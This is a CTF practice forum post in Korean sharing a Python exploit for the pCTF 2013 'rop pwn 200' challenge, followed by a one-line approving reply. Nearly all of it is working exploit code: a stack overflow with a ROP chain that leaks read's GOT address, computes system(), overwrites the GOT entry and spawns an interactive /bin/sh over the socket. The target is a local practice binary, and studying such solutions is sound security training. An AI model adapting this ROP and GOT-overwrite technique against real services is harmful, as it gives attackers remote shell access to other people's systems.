[pCTF 2013] rop pwn 200

해킹대회 문제 풀이 연습장소

Moderator: amesianx

Post Reply
swoo1013
Posts: 31
Joined: Tue Sep 20, 2016 4:25 pm

[pCTF 2013] rop pwn 200

Post by swoo1013 » Tue Jan 10, 2017 12:14 pm

Code: Select all

#!/usr/bin/env python
from socket import *
from time import *
from telnetlib import *
from struct import *
import pwn

def p(s):
    return pwn.p32(s)
def u(s):
    return pwn.u32(s)

# connection
def conn():
    s = socket(AF_INET,SOCK_STREAM)
    s.connect(('127.0.0.1',1234))
    return s

# variable setting!
read_plt = 0x804832c
read_got = 0x804961c
write_plt = 0x804830c
write_got = 0x8049614
pppr = 0x80484b6
binsh = "/bin/sh\x00"
writeable_mem = 0x8049530
offset = 0x99a10
size = 1024
print "exploit begin!!!\n"
sleep(0.1)

s = conn()
payload = "\x90"*140
#read(0,binsh_addr,len(binsh))
payload += p(read_plt)
payload += p(pppr)
payload += p(0)
payload += p(writeable_mem)
payload += p(len(binsh))

# for calc the system() addr
payload += p(write_plt)
payload += p(pppr)
payload += p(1)
payload += p(read_got)
payload += p(len(str(read_got)))

# overwrite address!!
payload += p(read_plt)
payload += p(pppr)
payload += p(0)
payload += p(read_got)
payload += p(len(str(read_got)))

# call system function
payload += p(read_plt)
payload += "aaaa" # dummy system return!
payload += p(writeable_mem)

# send and recv data!
s.send(payload + '\n')
s.send(binsh)
read = u(s.recv(4)) # save read function`s got(real address))
system_addr = read - offset
print "system address : %s " % hex(system_addr)

s.send(p(system_addr))
t = Telnet()
t.sock = s
t.interact()


print "exploit end!!!\n"

h0n9t3n
Posts: 48
Joined: Tue Oct 13, 2015 11:14 am

Re: pctf 2013 rop pwn 200

Post by h0n9t3n » Tue Jan 10, 2017 6:37 pm

오호 조아 ! :D

Post Reply

Who is online

Users browsing this forum: No registered users and 20 guests